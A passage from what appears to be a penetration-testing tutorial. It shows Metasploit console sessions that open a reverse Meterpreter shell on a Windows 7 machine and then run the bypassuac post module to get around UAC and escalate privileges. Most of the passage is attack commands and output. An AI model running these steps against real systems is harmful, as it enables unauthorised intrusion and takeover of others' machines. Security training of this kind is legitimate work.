Meterpreter Scripting
249
In this example, we use the post exploitation modules, which can be
used to bypass UAC. We first start the
multi/handler
module with the
-j
flag,
which allows us to accept multiple Meterpreter shells. Notice in this example
that when we try to run the
getsystem
command, it fails because it is being
blocked by Windows UAC.
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:2310) at
Thu June 09 08:02:45 -0500 2011
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > sysinfo
Computer: DAVE-DEV-PC
OS : Windows 7 (Build 7600).
Arch : x64 (Current Process is WOW64)
Language: en_US
meterpreter >
Notice that we can’t bridge over to a system-level account, because UAC
is blocking us. We need to get around UAC to obtain system-level privileges
and ultimately become an administrator so that we can further compromise
the machine. We press
CTRL
-Z to back out, keeping the session active. Then
we use the new format to run post
modules and bypass the Windows UAC
functionality.
msf exploit(handler) >
use post/windows/escalate/bypassuac
msf post(bypassuac) >
show options
Module options (post/windows/escalate/bypassuac):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST no Listener IP address for the new session
LPORT 4444 no Listener port for the new session
SESSION yes The session to run this module on.
msf post(bypassuac) >
set LHOST 172.16.32.128
LHOST => 172.16.32.128
msf post(bypassuac) >
set SESSION 1
SESSION => 1
msf post(bypassuac) >
exploit
[*] Started reverse handler on 172.16.32.128:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...